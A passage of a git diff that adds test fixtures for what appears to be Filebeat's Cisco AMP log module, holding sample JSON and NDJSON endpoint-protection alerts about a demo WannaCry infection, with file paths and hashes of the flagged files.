"host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 91988, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229331435814970", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 56000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 93180, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": 
"test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782278", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 773000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 94365, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + 
"cisco.amp.detection_id": "6419229335730782277", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 648000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 95638, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782276", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 
570000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 96911, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782275", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 414000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": 
"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 98184, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782274", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 368000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + 
"host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 99457, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782273", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 134000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 100730, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + 
"Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782272", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 87000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 102003, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + 
"cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782271", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 87000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 103275, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": 
"test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782270", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 56000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 104547, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log new file mode 100644 index 000000000000..6ccff00d38b1 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log 
@@ -0,0 +1,53 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847663","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot 
delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":572000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":120000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":1008,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":73000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":26000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
